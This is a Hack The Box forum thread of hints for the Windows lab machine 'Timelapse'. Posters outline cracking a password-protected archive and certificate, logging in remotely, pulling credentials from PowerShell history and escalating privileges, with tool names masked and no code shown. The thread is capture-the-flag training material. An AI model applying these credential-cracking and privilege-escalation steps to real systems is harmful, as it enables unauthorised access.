Finally Rooted
Thanks @cmoon for hints
Hi,
Iāve found a zip file which had a file in it. its in binary format so dont know how to read the content.
If anyone who has solved this or knows what to do and can point me in the right direction I would be grateful. Thank you
Letās say that Iāve done machines rated Hard that were comparable. Iām writing this for those who are struggling because I sure didā¦
Foothold
First start with doing basic enumeration. Get a grasp of what machine you are facing.
One of the first protocols you want to explore on this type of machine contains a file you want to store locally. In fact, save everything because you will need it at a later stage. Find the file that is password encrypted.
Crack this file converting it with your favorite tool. Use the big word-list you know
The name of the machine timelapse comes into play here. Repeat the previous step.
We have 2 files. What kind of files are they? How can we utilize them in order to connect to our target? (tip: for me the short parameters in the command e.g. -s, -k, ā¦ didnāt work. I have to write the long version with double dashes).
- Note: This will take some googling if you donāt know how to connect to this OS.
- Hint: Youāve seen the username while cracking and used the password the second time around.
User
Youāre logged in. Look around. See what the user has typed in before you logged in. Once you found to command to check the past, you have seen a new account with itās password. Logout, repeatā¦
- Note: Iāve read that our favorite windows privesc tool only works in .bat version but I had anti-virus blocking it so I dug manually.
Priv Esc
As a side step, but you donāt have to, you should get familiar with the tool Bloodhound. It makes a nice graphical overview and can hunt trivial data through itās pre-written queries.
- Note: Kali version works out of the box but you need the python version to retrieve data and the additional importer repo to parse the JSON data to Neo4j.
So weāve established a new user with additional functionality. Remember when we downloaded all those files before? Yep, thatās our gateway to root.
Bloodhound wouldāve made this very clear as well. A lot of googling is required to understand how to retrieve the data we want as not all commands are functional on this particular machine.
Also read all the files you downloaded. Something should immediately pop-out.
Keep trying to retrieve it using different commands. Powershell, it just works.
Rooted!
Most of the hints on this thread are all you need, but if you have any problems you can DM on Discord or write me a PM here
Hi, I have foothold. Anyone have any problem with antivirus blocking the execution of just about any tool for privilege escalation?
Thank you @ctrlzero for the interesting box. Learnt two new things about Windows while doing this box
For an easy box, this one really threw me for some loops. Hadnāt authād with SSL via e***-win** before. The nested encrypted files were fun, and after going down a rabbit hole or two the privesc path was obvious. Just swap out the whoami with the ps cmd you need to run under the svc account and add some filtering to the cmd.
As always, enum is key. Thanks @ctrlzero for the box! Learned some new techniques.
Donāt need to upload any tools to the box for this one.
Hi, i am new to htb, and i am trying to pentest timelapse easy level machine, i need help its been 5 hours but i am not able to start or didnāt find any way to get in this machine, can somebody help me, it will be very helpful.
Oh thank you so much! It triggered something all right, after days of misery e***-w**** -c option is very misleading.
Got user! For an easy box I certainly learned some things on this one! On to root! Message me if youāre stuck on enum or user. Cheers!
eta
and rooted! What a fun box! Somewhere between easy and medium Iād say. Can get everything you need pretty much with pure Kali.
Wow this was a doozy. I wouldnāt classify this as āEasyā more medium at a minimum. As frustrating as this box was I have to say it is one of my favorite machines Iāve rooted.
Foothold: Pretty easy honestly. Enumerate, enumerate, enumerate! Also make sure youāre setting the right flags with the devious program you need. Otherwise youāre going to waste alot of time. Getting the user flag was extremely easy after this point.
Root: Hopefully youāve been exploring the computer pretty well because youāre gonna need to learn to move laterally. Keep googling the applications on the host and youāll get it.
Thanks @ctrlzero for a great experience!
Just got this one ROOTED, itās been quite a while since Iāve #1 got a HTB root and a Windows box at that. The hints in the forum already paint a pretty solid picture, but my DMās are open for anyone who may need some nudges. 8/10 box, was definitely a solid learning experience.
Rooted, great box
Hi guys,
It is my second attempt on this box. I started fresh as I am not sure if I missed something in the previous step. In my first attempt, I used s****** to obtain the zip file. However, this time I got an error message: Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.xx.xxx failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 ā no workgroup available.
Here is the command I use: s******** -L \\10.10.xx.xxx/S*****.
I am just wondering if something have changed so I can no longer obtain the file from there or it is the problem of my VM.
Thank you for your time.
Hello, I have access to s**_******, but I am a tad stuck on what to do next. I have been perusing through the previously extracted documents and I am not sure if its intended for some of the expected files to be missing.
Hey all,
I have gotten User but am having trouble with priv esc - i found the History and know I need to figure out how to execute commands as s**_d***** - but I cant figure out how to get that to work
I think I know what to do after I pivot to s**_d***** but Im just having a lot of trouble on this part
any nudge/help would be greatly appreciated
id say just get rid of /S***** and try it again
I know exactly what to do but Iām not powershell coder and the original PoC looks to be broken for updated powershell.
Wow. I want to complain about this box, but I just canāt now. I really enjoyed it in the end, I really did.
User was a lot of fun. I was familiar with the connection tool, but never had to mess with certs, so that was a really nice touch.
The pivot after getting user took me a while to figure out since Iām not very familiar with Windows machines. So I really appreciate that bit since it was a great learning experience. Once that pivot was done, root just fell into place.
Great box. PM me with questions.